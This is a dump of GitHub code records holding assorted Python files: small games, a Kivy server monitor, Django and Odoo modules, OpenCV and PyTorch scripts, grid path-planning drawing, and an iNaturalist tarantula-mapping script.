xtick)\nplt.show()\n","repo_name":"kimsangho611/DSL_study","sub_path":"2020202064_전혜림/Project/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"2776135117","text":"from random import randint\n\nplayer_wins = 0\ncomputer_wins = 0\nwinning_score = 3\n\nwhile player_wins < winning_score and computer_wins < winning_score:\n print(f\"Player Score: {player_wins} Computer Score: {computer_wins}\")\n print(\"Rock...\")\n print(\"Paper...\")\n print(\"Scissors...\")\n print(\"Enter your choice: \")\n\n player = input(\"Player 1, make your move.\\nYou can also type 'quit' or 'q' to quit the game:\\n\").lower()\n\n if player == \"quit\" or player == \"q\":\n break\n\n rand_num = randint(0, 2)\n if rand_num == 0:\n computer = \"rock\"\n elif rand_num == 1:\n computer = \"paper\"\n else:\n computer = \"scissors\"\n\n print(f\"The computer plays: {computer}\")\n\n if player == computer:\n print(\"Tie game!!\")\n elif player == \"rock\":\n if computer == \"scissors\":\n print(\"The player wins!!\")\n player_wins += 1\n else:\n print(\"The computer wins!!\")\n computer_wins += 1\n elif player == \"paper\":\n if computer == \"rock\":\n print(\"The player wins!!\")\n player_wins += 1\n else:\n print(\"The computer wins!!\")\n computer_wins += 1\n elif player == \"scissors\":\n if computer == \"rock\":\n print(\"The computer wins!!\")\n computer_wins += 1\n else:\n print(\"The player wins!!\")\n player_wins += 1\n else:\n print(\"Something went wrong, please enter a choice\")\n\nif player_wins > computer_wins:\n print(\"YOU WIN!!\")\nelse:\n print(\"OH NO!! THE COMPUTER WON :(\")\nprint(f\"Final Score... Player Score: {player_wins} Computer Score: {computer_wins}\")","repo_name":"patricklapgar/Rock_Paper_Scissors_Game","sub_path":"rps_version_4.py","file_name":"rps_version_4.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24613810665","text":"import os\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\n\n\ndef image_paths(scale, mode, path='./'):\n if scale == 'multiple':\n scale = [3, 4] if mode == 'train' else [4, 6]\n\n input = [os.path.join(path, f'blur_scale_{s}/X_{mode}.npy') for s in scale]\n label = os.path.join(path, f'blur_scale_1/X_{mode}.npy')\n return input, label\n\n\nclass TrainDataset(Dataset):\n def __init__(self, input_path, label_path, N=None):\n super(TrainDataset, self).__init__()\n k = len(input_path)\n\n # number of samples\n if N==None: N = np.load(input_path[0]).shape[0]\n\n # mixing samples of k blurring scales\n self.input = np.concatenate([np.load(_)[(i * (N // k)): ((i + 1) * (N // k))] for i, _ in enumerate(input_path)], axis=0)\n self.label = np.load(label_path)[:N]\n\n # to Torch tensor\n self.input = torch.from_numpy(self.input)\n self.label = torch.from_numpy(self.label)\n\n def __getitem__(self, idx):\n X = self.input[idx]\n y = self.label[idx]\n\n return X, y\n\n def __len__(self):\n return len(self.input)","repo_name":"HHTseng/Layer-Variational-Analysis","sub_path":"Exp3_SRCNN/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"16172792372","text":"from odoo import fields, models, api\n\n\nclass AccountMove(models.Model):\n _inherit = 'account.move'\n\n pos_order_ids = fields.One2many('pos.order', 'account_move')\n\n def _stock_account_get_last_step_stock_moves(self):\n stock_moves = super(AccountMove, self)._stock_account_get_last_step_stock_moves()\n for invoice in self.filtered(lambda x: x.type == 'out_invoice'):\n stock_moves += invoice.sudo().mapped('pos_order_ids.picking_id.move_lines').filtered(lambda x: x.state == 'done' and x.location_dest_id.usage == 'customer')\n for invoice in self.filtered(lambda x: x.type == 'out_refund'):\n stock_moves += invoice.sudo().mapped('pos_order_ids.picking_id.move_lines').filtered(lambda x: x.state == 'done' and x.location_id.usage == 'customer')\n return stock_moves\n\n def _compute_amount(self):\n super(AccountMove, self)._compute_amount()\n pos_invoices = self.filtered(lambda i: i.type in ['out_invoice', 'out_refund'] and i.pos_order_ids)\n for invoice in pos_invoices:\n invoice.invoice_payment_state = 'paid'\n\nclass AccountMoveLine(models.Model):\n _inherit = 'account.move.line'\n\n def _stock_account_get_anglo_saxon_price_unit(self):\n self.ensure_one()\n if not self.product_id:\n return self.price_unit\n price_unit = super(AccountMoveLine, self)._stock_account_get_anglo_saxon_price_unit()\n order = self.move_id.pos_order_ids\n if order:\n price_unit = - order._get_pos_anglo_saxon_price_unit(self.product_id, self.move_id.partner_id.id, self.quantity)\n return price_unit\n\n def _get_refund_tax_audit_condition(self, aml):\n # Overridden so that the returns can be detected as credit notes by the tax audit computation\n rslt = super()._get_refund_tax_audit_condition(aml)\n\n if aml.move_id.is_invoice():\n # We don't need to check the pos orders for this move line if an invoice\n # is linked to it ; we know that the invoice type tells us whether it's a refund\n return rslt\n\n pos_orders_count = self.env['pos.order'].search_count([('account_move', '=', aml.move_id.id)])\n return rslt or (pos_orders_count and aml.debit > 0)\n","repo_name":"saifDiu/odoo_13_my_module","sub_path":"addons/point_of_sale/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"69932768480","text":"import torch\nfrom vietocr.model.backbone.cnn import CNN\nimport torch.nn as nn\nimport time\nimport torchvision\nfrom torchsummary import summary\n\n\ndef _cnn_backbone(img_channel, img_height, img_width, leaky_relu):\n assert img_height % 16 == 0\n assert img_width % 4 == 0\n\n channels = [img_channel, 64, 128, 256, 256, 512, 512, 512]\n kernel_sizes = [3, 3, 3, 3, 3, 3, 2]\n strides = [1, 1, 1, 1, 1, 1, 1]\n paddings = [1, 1, 1, 1, 1, 1, 0]\n\n cnn = nn.Sequential()\n\n def conv_relu(i, batch_norm=False):\n # shape of input: (batch, input_channel, height, width)\n input_channel = channels[i]\n output_channel = channels[i+1]\n\n cnn.add_module(\n f'conv{i}',\n nn.Conv2d(input_channel, output_channel, kernel_sizes[i], strides[i], paddings[i])\n )\n\n if batch_norm:\n cnn.add_module(f'batchnorm{i}', nn.BatchNorm2d(output_channel))\n\n relu = nn.LeakyReLU(0.2, inplace=True) if leaky_relu else nn.ReLU(inplace=True)\n cnn.add_module(f'relu{i}', relu)\n\n # size of image: (channel, height, width) = (img_channel, img_height, img_width)\n conv_relu(0)\n cnn.add_module('pooling0', nn.MaxPool2d(kernel_size=2, stride=2))\n # (64, img_height // 2, img_width // 2)\n\n conv_relu(1)\n cnn.add_module('pooling1', nn.MaxPool2d(kernel_size=2, stride=2))\n # (128, img_height // 4, img_width // 4)\n\n conv_relu(2)\n conv_relu(3)\n cnn.add_module(\n 'pooling2',\n nn.MaxPool2d(kernel_size=(2, 1))\n ) # (256, img_height // 8, img_width // 4)\n\n conv_relu(4, batch_norm=True)\n conv_relu(5, batch_norm=True)\n cnn.add_module(\n 'pooling3',\n nn.MaxPool2d(kernel_size=(2, 1))\n ) # (512, img_height // 16, img_width // 4)\n\n conv_relu(6) # (512, img_height // 16 - 1, img_width // 4 - 1)\n\n output_channel, output_height, output_width = \\\n channels[-1], img_height // 16 - 1, img_width // 4 - 1\n return cnn, (output_channel, output_height, output_width)\n\ndevice= 'cuda'\n#cnn_config_vgg19 = {'ss': [[2, 2], [2, 2], [2, 1], [2, 1], [1, 1]], 'ks': [[2, 2], [2, 2], [2, 1], [2, 1], [1, 1]], 'hidden': 256}\n#cnn = CNN('vgg19_bn', **cnn_config_vgg19)\n#cnn_config_vgg11 = {'ss': [[2, 2], [2, 2], [2, 1], [2, 1], [1, 1]], 'ks': [[2, 2], [2, 2], [2, 1], [2, 1], [1, 1]], 'hidden': 256}\n#cnn = CNN('vgg11_bn', **cnn_config_vgg11)\n#cnn_config_resnet50 = {'ss': [[2, 2], [2, 1], [2, 1], [2, 1], [1, 1]], 'hidden': 256} \n#cnn = CNN('resnet50', **cnn_config_resnet50)\n#cnn_config_resnet18 = {'ss': [[2, 2], [2, 1], [2, 1], [2, 1], [1, 1]], 'hidden': 256} \n#cnn = CNN('resnet18', **cnn_config_resnet18)\n#cnn,_ = _cnn_backbone(img_channel=3, img_height=32, img_width=220, leaky_relu=True)\n#cnn = CNN('mobilenetv1_0.25')\ncnn_config_mobilenetv2 = {'ss': [[2, 2], [2, 1], [2, 1], [2, 1], [1, 1]], 'hidden': 256} \ncnn = CNN('mobilenetv2', **cnn_config_mobilenetv2)\n#cnn = torchvision.models.mobilenet_v2()\n#cnn = torch.nn.Sequential(*(list(cnn.children())[0][:7]))\n#cnn = torchvision.models.shufflenet_v2_x1_5()\n#cnn = torch.nn.Sequential(*(list(cnn.children())[0][:7]))\n#cnn = torchvision.models.mnasnet1_0()\n#cnn = torch.nn.Sequential(*(list(cnn.children())[0][:9]))\n#print(cnn)\ncnn = cnn.to(device)\nif device == \"cuda\":\n summary(cnn, (3, 32, 1024))\ntorch.cuda.synchronize()\nt1 = time.time()\nx = torch.zeros(1, 3, 32, 1024).to(device)\ny = cnn(x)\nprint(y.shape)\ntorch.cuda.synchronize()\nprint(time.time()-t1)\n\n","repo_name":"TrangLeQuynh/vietocr","sub_path":"test_backbone.py","file_name":"test_backbone.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17657790651","text":"class Student:\r\n ID=\"\"\r\n CGPA=\"\"\r\n\r\n\r\n def __init__(self,roll,cgpa):\r\n self.ID=roll\r\n self.CGPA=cgpa\r\n\r\n def display(self):\r\n print(f\"ID:{self.ID},cgpa:{self.CGPA}\")\r\n\r\nMomin= Student(123,3.54)\r\nMomin.display()\r\nAminul=Student(213112,3.45)\r\nAminul.display()","repo_name":"Mominul-Islam-cmd/python_practice","sub_path":"Opp/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18515865680","text":"from kivy.uix.button import Button\nfrom kivy.uix.label import Label\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.uix.image import Image\nfrom servermacc import TestServerAdd\nfrom callservertest import *\nimport threading\nimport requests\nimport time \nfrom emailconf import send_email\n\n\nclass FunServer(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n # Creamos los widgets de la pantalla\n self.label = Label(text=\"¡Esta es la pantalla de Test Server!\", font_size=24, halign=\"center\")\n self.status_button = Button(text=\"Inactivo\", font_size=20, size_hint_y=None, height=50)\n self.status_button.bind(on_press=self.change_status)\n self.status = \"inactivo\"\n\n\n self.button_atras = Button(text=\"Volver\", font_size=20, size_hint_y=None, height=50)\n self.button_atras.bind(on_press=self.switch_to_funserver)\n\n # Creamos una instancia de AsyncImage con la imagen del espiral\n self.spiral = Image(source=\"server_icon_197663.png\")\n\n # Creamos un layout vertical para los widgets\n layout = BoxLayout(orientation=\"vertical\", padding=50, spacing=20)\n layout.add_widget(self.label)\n\n layout.add_widget(self.status_button)\n layout.add_widget(self.button_atras)\n\n layout.add_widget(self.spiral)\n\n # Agregamos el layout a la pantalla\n self.add_widget(layout)\n\n\n def switch_to_funserver(self, instance):\n screen_manager = self.manager\n self.status_button.text = \"Inactivo\"\n screen_manager.current = \"next_screen\"\n stop_thread_execution()\n\n\n\n def on_enter(self):\n # Buscamos el objeto TestServerAdd en la lista de pantallas de la aplicación\n for screen in self.manager.screens:\n if isinstance(screen, TestServerAdd):\n self.test_server_add = screen\n break\n\n def change_status(self, instance):\n\n stop_event.clear()\n\n # Cambiamos el estado y actualizamos el texto del botón\n if self.status == \"inactivo\":\n self.status = \"activo\"\n self.status_button.text = \"Activo\"\n self.label.text = \"Probando Conexion con los Servidores\"\n self.spiral.opacity = 1 # Ocultamos el espiral\n if self.test_server_add: \n if self.status_button.text == \"Activo\":\n t = threading.Thread(target=testServerCAll, args=(self.test_server_add.servers,))\n t.start()\n\n\n else:\n self.status = \"inactivo\"\n self.status_button.text = \"Inactivo\"\n self.label.text = \"Se ha detenido Conexion con los Servidores\"\n self.spiral.opacity = 0 # Mostramos el espiral\n stop_thread_execution()\n\n#####################################################################################\n\n\n\nstop_event = threading.Event()\n\ndef testServerCAll(getlist):\n while True:\n for url in getlist:\n start_time = time.time()\n \n try:\n response = requests.head(url, verify=False, timeout=10)\n if response.status_code == 200:\n pass\n else:\n end_time = time.time()\n result = f\"Fallo de solicitud a {url}. Código de estado: {response.status_code}\\nLa solicitud tardó: {end_time - start_time} segundos en completarse\\n\\n\"\n send_email(result)\n except requests.exceptions.Timeout:\n result = f\"Timeout de conexión con {url}\\n\\n\"\n send_email(result)\n except requests.exceptions.RequestException as e:\n result = f\"Error de conexión con {url}: {e}\\n\\n\"\n \n send_email(result)\n\n if stop_event.is_set():\n break\n\ndef stop_thread_execution():\n stop_event.set()\n \n","repo_name":"MikeCardona076/Tester-MACC-SERVER","sub_path":"testserver.py","file_name":"testserver.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"7704971002","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name='index'),\n path(\"home\", views.home, name='home'),\n path(\"register\", views.register, name='register'),\n path(\"setup\", views.setup, name='setup'),\n path(\"createSlot\", views.create_slot, name='create_slot'),\n path(\"login\", views.login_view, name=\"login_view\"),\n path(\"logout\", views.logout_view, name=\"logout_view\"),\n]","repo_name":"anusha421/MeetUp","sub_path":"meetup/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20886070410","text":"import numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\n\n# read\nimg = cv.imread('logo.jpg', cv.IMREAD_COLOR)\n\n# convert to gray\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n# blur\nblur = cv.medianBlur(gray, 5)\n\n# get circles\ncircles = cv.HoughCircles(blur, cv.HOUGH_GRADIENT, 1, 20, param1=150, param2=30, minRadius=0, maxRadius=0)\n\n# around to make it integer\ncircles_around = np.around(circles)\n\n# convert float32 to uint16\ncircles_uint16 = np.uint16(circles_around)\n\n# make result\nresult = img.copy()\n\n# loop\nfor circle in circles_uint16[0, :]:\n # get center\n center = tuple(circle[0:2])\n # get radius\n radius = int(circle[2])\n # draw the outer circle\n cv.circle(result, center, radius, (0, 255, 0), 2)\n # draw the center of the circle\n cv.circle(result, center, 2, (0, 0, 255), 3)\n\n# show\nplt.subplot(2, 2, 1), plt.imshow(img), plt.title(\"original\")\nplt.subplot(2, 2, 2), plt.imshow(blur, \"gray\"), plt.title(\"blur\")\nplt.subplot(2, 2, 3), plt.imshow(gray, \"gray\"), plt.title(\"gray\")\nplt.subplot(2, 2, 4), plt.imshow(result), plt.title(\"result\")\nplt.show()\n","repo_name":"AlanLi7991/opencv-turtorial-notes","sub_path":"04-image/27-hough-circle.py","file_name":"27-hough-circle.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"15033257301","text":"from django.shortcuts import render, redirect, HttpResponse\nfrom django.shortcuts import render, redirect, reverse, get_object_or_404\nfrom django.core.mail import send_mail\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import (\n login_required,\n user_passes_test,\n login_required,\n)\nfrom django.contrib.auth import authenticate, login as auth_login, logout as auth_logout\nimport datetime as dt\nfrom datetime import datetime, timedelta, date\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom django.views.decorators.csrf import csrf_protect, csrf_exempt\nfrom home.views import give_doctors_of_this_department\nfrom home.models import Departments\nfrom doctor.models import Doctor, BookAppointment\nfrom patient.models import Patient\nfrom blogs.models import *\nfrom blogs.forms import *\nfrom django.contrib.auth.models import User\n\n\ndef bhome(request):\n user = request.user\n usertype = {\"doc\": 0, \"pat\": 0}\n if request.user.is_authenticated:\n try:\n if user.doctor:\n usertype[\"doc\"] = 1\n doctor = user.doctor\n records = BookAppointment.objects.filter(doctor_id=user.doctor.id)[::-1]\n #########\n try:\n status = request.GET[\"aor\"]\n record_id = int(status[:-1])\n record = BookAppointment.objects.get(id=record_id)\n if status[-1] == \"a\":\n record.status = 1\n record.save()\n else:\n record.delete()\n except:\n status = None\n d = {\"doctor\": doctor, \"records\": records}\n except:\n usertype[\"pat\"] = 1\n patient = user.patient\n records = BookAppointment.objects.filter(patient_id=user.patient.id)\n else:\n records = []\n # accepting or rejecting appointments\n bdone = 1\n data = {}\n all_blogs = Blogs.objects.all()[::-1]\n departments = Departments.objects.all()\n b = Blogs()\n try:\n print(\"try chala of loadmore\")\n loadmore = request.GET[\"loadmore\"]\n b.load += 1\n if b.load * 5 >= len(all_blogs):\n b.load = 1\n blogs = all_blogs\n else:\n value = b.load * 5\n blogs = all_blogs[:value]\n except:\n print(\"except of loadmore\")\n if len(all_blogs) <= 5:\n blogs = all_blogs\n bdone = 0\n else:\n blogs = all_blogs[:5]\n for department in departments:\n data[department] = give_doctors_of_this_department(department)\n d = {\n \"departments\": departments,\n \"data\": data,\n \"user\": user,\n \"usertype\": usertype,\n \"records\": records,\n \"ln\": len(blogs),\n \"blogs\": blogs,\n \"bdone\": bdone,\n }\n return render(request, \"blogs/index.html\", d)\n\n\ndef createblog(request):\n try:\n print(\"try chala\")\n title = request.GET[\"title\"]\n description = request.GET[\"desc\"]\n except:\n title = description = None\n print(\"Except chala\")\n if title and description:\n print(\"TITLE_AND_DESCRIPTION\")\n obj = Blogs.objects.create(user=request.user)\n obj.user = request.user\n obj.title = title\n obj.description = description\n obj.save()\n return redirect(\"blogs\")\n d = {}\n return render(request, \"blogs/createblog.html\", d)\n\n\ndef particular_blog(request, pk):\n user = request.user\n usertype = {\"doc\": 0, \"pat\": 0}\n blog = Blogs.objects.get(id=pk)\n departments = Departments.objects.all()\n if request.user.is_authenticated:\n try:\n if user.doctor:\n usertype[\"doc\"] = 1\n doctor = user.doctor\n print(\"DDDDDD\", doctor, type(doctor), doctor.user.username)\n records = BookAppointment.objects.filter(doctor_id=user.doctor.id)[::-1]\n #########\n try:\n print(\"HOMEEE\")\n status = request.GET[\"aor\"]\n record_id = int(status[:-1])\n print(\"STATUS\", status)\n record = BookAppointment.objects.get(id=record_id)\n if status[-1] == \"a\":\n print(\"BEFORE\", record.status)\n record.status = 1\n record.save()\n print(\"AFTER\", record.status)\n else:\n record.delete()\n except:\n status = None\n d = {\n \"doctor\": doctor,\n \"records\": records,\n \"blog\": blog,\n \"user\": user,\n \"departments\": departments,\n }\n except:\n print(\"PATIENTTTTTT\")\n usertype[\"pat\"] = 1\n patient = user.patient\n records = BookAppointment.objects.filter(patient_id=user.patient.id)\n d = {\n \"patient\": patient,\n \"records\": records,\n \"blog\": blog,\n \"user\": user,\n \"departments\": departments,\n }\n else:\n records = []\n return render(request, \"blogs/particular_blog.html\", d)\n","repo_name":"sagar-panditji/WARDAAN","sub_path":"blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"32848118512","text":"import itertools\nfrom PIL import (\n Image, ImageDraw,\n)\nfrom IPython.display import display\n\nfrom container.base import (\n OpenBase, ClosedBase,\n)\n\nfrom graph.node import Node\nfrom graph.grid import GridMap\n\n\ndef drawResult(\n grid: GridMap,\n start: Node = None,\n goal: Node = None,\n path: list = None,\n closed_list: ClosedBase = None,\n open_list: OpenBase = None,\n draw_cost: bool = False,\n save: bool = False,\n plot: bool = True,\n) -> None:\n \n def getRectangle(\n i: int,\n j: int,\n k: int,\n ) -> list:\n \n return [j * k, i * k, (j + 1) * k - 1, (i + 1) * k - 1]\n \n k = 20\n hIm = grid.height * k\n wIm = grid.width * k\n im = Image.new('RGB', (wIm, hIm), color = 'white')\n draw = ImageDraw.Draw(im)\n \n for i, j in itertools.product(range(grid.height), range(grid.width)):\n if grid.isObstacle(i, j):\n draw.rectangle(\n xy = getRectangle(i, j, k),\n fill = (70, 80, 80),\n )\n \n for nodes, color in zip((open_list, closed_list ),\n ((213, 219, 219), (131, 145, 146))):\n if nodes is not None:\n for node in nodes:\n draw.rectangle(\n xy = getRectangle(node.i, node.j, k),\n fill = color,\n width = 0,\n )\n \n if draw_cost:\n for node in nodesExpanded:\n coord = getRectangle(node.i, node.j, k)\n draw.text(\n xy = ((coord[0] + coord[2]) // 2, (coord[1] + coord[3]) // 2),\n text = '%.1f' % (node.g),\n fill = (231, 76, 60),\n )\n\n if path is not None:\n for node in path:\n draw.rectangle(\n xy = getRectangle(node.i, node.j, k),\n fill = (52, 152, 219) if not grid.isObstacle(node.i, node.j) else (230, 126, 34),\n width = 0,\n )\n \n for keypoint, color in zip((start, goal ),\n ((40, 180, 99), (231, 76, 60))):\n\n if keypoint is not None:\n draw.rectangle(\n xy = getRectangle(keypoint.i, keypoint.j, k),\n fill = color, \n width = 0,\n )\n if plot:\n display(im)\n \n if save:\n im.save(f'images/{start.i}_{start.j}|{goal.i}_{goal.j}.png')","repo_name":"Ilyabasharov/path_planning","sub_path":"utils/visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"15314787275","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#map geo data source\n#https://www.census.gov/geographies/mapping-files/time-series/geo/carto-boundary-file.html\n#https://www.parks.ca.gov/?page_id=29682\n#iNaturalist sources\n#https://pyinaturalist.readthedocs.io/en/stable/modules/pyinaturalist.v1.observations.html#pyinaturalist.v1.observations.get_observations\n#https://www.inaturalist.org/pages/api+reference\n\n#########################################\n\n#You will need three shape files to create the map.\n#Download California_shape_Archive.zip from https://github.com/Floydworks/Tarantulas_Map_iNat/tree/main/shape_files\n#Or use wesites in source information (this may require changing the map projections)\n\n#######################################\n \n\n\n# In[2]:\n\n\nfrom pyinaturalist.node_api import get_all_observations\nimport pandas as pd\nimport numpy as np\nfrom datetime import date, datetime\nimport time\n\nimport geopandas as gpd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mlines\nimport matplotlib.patches as mpatches\n\nprint(\"Libraries imported!\")\n\n\n# In[3]:\n\n\n#define start time for entire process\nstart_time = time.time()\n\n\n# In[4]:\n\n\n#define function, simplify_observation, to extract the desired data from the query return list object, Observations.\n#returning a newly created dictionary of extracted values, simplified_obs.\n\ndef simplify_observation(obs):\n\n simplified_obs = {}\n \n # Top level values\n simplified_obs['Date'] = obs['observed_on'] \n simplified_obs['Created_Date'] = obs['created_at']\n simplified_obs['Updated_Date'] = obs['updated_at']\n simplified_obs['Location_Name'] = obs['place_guess']\n simplified_obs['Place_ids'] = obs['place_ids'] \n simplified_obs['URL'] = obs['uri']\n simplified_obs['quality'] = obs['quality_grade']\n \n # Nested values\n simplified_obs['species_name'] = obs['taxon']['name']\n simplified_obs['coordinates'] = obs['geojson']['coordinates'] \n simplified_obs['endemic'] = obs['taxon']['endemic']\n simplified_obs['native'] = obs['taxon']['native']\n simplified_obs['threatened'] = obs['taxon']['threatened']\n simplified_obs['threatened'] = obs['taxon']['observations_count']\n \n#Name new columns and fill with values extracted from dataset\n \n #split lat, long into separate columns\n for i in range(len(obs['geojson']['coordinates'])):\n #create columns for lat and long separately\n simplified_obs['lat'] =obs['geojson']['coordinates'][0]\n simplified_obs['long'] =obs['geojson']['coordinates'][1]\n \n #split species name into separate columns, 'genus', 'species', and 'variety'\n for i in range(len(obs['taxon']['name'])):\n tn = obs['taxon']['name'] + ' ' + 'none' + ' ' + 'none' #add a space to alleviate name anatomy issues\n #create columns for genus and species separately\n simplified_obs['genus'] =tn.split(' ')[0]\n simplified_obs['species'] =tn.split(' ')[1]\n simplified_obs['variety'] =tn.split(' ')[2]\n \n #Media/photo path columns\n for i in range(len(obs['photos'])): \n # Change value here if you want more or less than 3 photos \n if(i<1):\n simplified_obs['photo '+str(i)] = obs['photos'][i]['url'].replace('square', 'original') \n\n return simplified_obs\n\n\n# In[5]:\n\n\n#Call query through pyinaturalist.node_api, no authentication required\nprint(\"This may take a few minutes... For larger exports you may need to get a key from iNaturalist\")\n\nstart_time_query = time.time()\n#use today's date as the maximum date for data retreival\ntoday = date.today()\n\n#assign iNaturalist place IDs (see iNaturalist.org)\nPLACES = [14] #14= California\n#initialize empty list for storing data\nObservations = [] \n\nfor p in PLACES:\n \n observations_research = get_all_observations( \n taxon_id=47423, # Taxon ID for Aphonopelma spp. Tarantulas\n place_id=[p], # Location ID from PLACES list\n d1='2018-01-01', # Get observations from October 1st 2017...\n d2= today, # ...through today\n #created_d1= '2023-01-01',\n #created_d2= today,\n #updated_since ='2023-01-01', #Must be updated since this time\n #radius = #Must be within a {radius} kilometer circle around this lat/lng (lat, lng, radius)\n geo=True, # Only get observations with geospatial coordinates\n geoprivacy='open', # Only get observations with public coordinates (not obscured/private)\n #quality_grade = 'research' #Only get research grade observations\n \n )\n print(\"Observations\", str(p), \"ready!\", \"This place_id has:\", len(observations_research), \"observations\")\n \n #add queried data, observations_research, to storage list, Observations\n Observations = Observations+observations_research\n \nprint(\"Observations concatenated!\",\"There are:\", len(Observations), \"observations, prior to cleaning your dataset\")\n\nquery_time = (time.time() - start_time_query)\nprint(\"Run time for your api request: %s seconds\" % (query_time))\n\n\n# In[6]:\n\n\n#apply function (simplify_observation() to each observation in Observations and store in list object\nsimpleObs = [simplify_observation(obs) for obs in Observations] #returns nested dictionary\nprint(\"Observations simplified!\")\n\n#convert list object simpleObs to pandas dataframe df_obs\ndf_obs = pd.DataFrame.from_records(simpleObs)\n\n#export the complete dataset\ndate_string = str(today.month)+\"_\"+str(today.day)+\"_\"+str(today.year)\ndf_obs.to_csv(f'YOUR FILE PATH{date_string}.csv')\n\n\n# In[7]:\n\n\n#clean data and drop certain data\n\n# replace 'none' with NaN\nprior_len = len(df_obs)\ndf_obs = df_obs.replace('none', np.nan)\nprint(prior_len - len(df_obs), \"'none' species names converted to NaN values\")\n\n#drop observations with no species name\n#prior_len = len(df_obs)\n#df_obs = df_obs.dropna(subset=['species'])\n#print(prior_len-len(df_obs), \"observations had no species name\")\n\n#drop observations with no genus name\nprior_len = len(df_obs)\ndf_obs = df_obs.dropna(subset=['genus'])\nprint(prior_len-len(df_obs), \"observations had no genus name\")\n\n#drop observations with no date\nprior_len = len(df_obs)\ndf_obs = df_obs.dropna(subset=['Date'])\nprint(prior_len - len(df_obs), \"observations had no date\")\n\n#drop observations below research grade\n#prior_len = len(df_obs)\n#df_obs = df_obs[df_obs[\"quality\"].str.contains(\"needs_id|casual\") == False]\n#print(prior_len-len(df_obs), \"oservations were below research grade\")\n\n\n# In[8]:\n\n\ndf_obs.reset_index(inplace = True)\nprint('There are:', len(df_obs), 'observations in the dataset.')\ndisplay(df_obs.head(3))\n\n\n# In[ ]:\n\n\n# Make a map of California with county borders, tarantula observations, state parks, and wilderness areas.\n\n\n# In[12]:\n\n\n#city DICTIONARY \ncity_info_dict = {\n \"San Jose\": {\"place_id\":\"\",\"region\": \"south bay\", 'lat_long':(37.2959622,-121.8160962)},\n \"Los Angeles\": {\"place_id\":\"\",\"region\": \"southern\", 'lat_long':(34.020479,-118.4117325)},\n \"Sacramento\": {\"place_id\":\"\",\"region\": \"northern\", 'lat_long':(38.6594734, -121.21373)},\n }\n\n#create dataframe of city information\ncity_info_df = pd.DataFrame.from_dict(city_info_dict, orient='index').reset_index()\ncity_info_df = city_info_df.rename(columns={'index':'city'})\n\ndisplay(city_info_df)\n\n\n# In[10]:\n\n\n#define shape file paths\n\nCA_counties_shp = 'YOUR FILE PATH/CA_Counties_TIGER2016_4269.shp'\nCA_wilderness_areas = 'YOUR FILE PATH/Wilderness_Areas_122721_EPSG4269_CALIFORNIA.shp'\nCA_state_parks = 'YOUR FILE PATH/ParkBoundaries_EPSG4269_CALIFORNIA.shp'\n\n# initialize an axis\nfig, ax = plt.subplots(figsize=(15,12))\n\n# plot map on axis\n#California Counties outline\nshape = gpd.read_file(CA_counties_shp)\n#shape = shape[shape['COUNTYFP'].isin(['019','027','107'])]\n\n#Wilderness areas outlines\nwilderness = gpd.read_file(CA_wilderness_areas)\n# find specific park(s)\n#wilderness = wilderness[wilderness['NAME_ABBRE'].str.contains(\"Kings_Canyon\")] \n\n#State parks areas outlines\nstate_parks = gpd.read_file(CA_state_parks)\n\nshape.plot(color=\"lightgrey\", edgecolor='darkgrey',ax=ax)\nwilderness.plot(color=\"lightgreen\", alpha=.6, ax=ax) #edgecolor='darkgreen',\nstate_parks.plot(color=\"yellow\", alpha=1, ax=ax) #edgecolor='gold',\n\n#define observation x and y using lat and long from the iNat observations\nx = df_obs['lat']\ny = df_obs['long']\n#plot the tarantula observations\nplt.scatter(x, y, c= \"blue\", alpha=1, s=2.5)\n\n#add major cities to the map\n#manually place each city and adjust text position to avoid observation points\nplt.text((city_info_df.loc[city_info_df['city'] == 'San Jose', 'lat_long'].iloc[0][1])+.22, \n (city_info_df.loc[city_info_df['city'] == 'San Jose', 'lat_long'].iloc[0][0]), \n 'San Jose', color = 'black', fontsize=15)\nplt.text((city_info_df.loc[city_info_df['city'] == 'Los Angeles', 'lat_long'].iloc[0][1])-2.5,\n (city_info_df.loc[city_info_df['city'] == 'Los Angeles', 'lat_long'].iloc[0][0]),\n 'Los Angeles', color = 'black', fontsize=15)\nplt.text((city_info_df.loc[city_info_df['city'] == 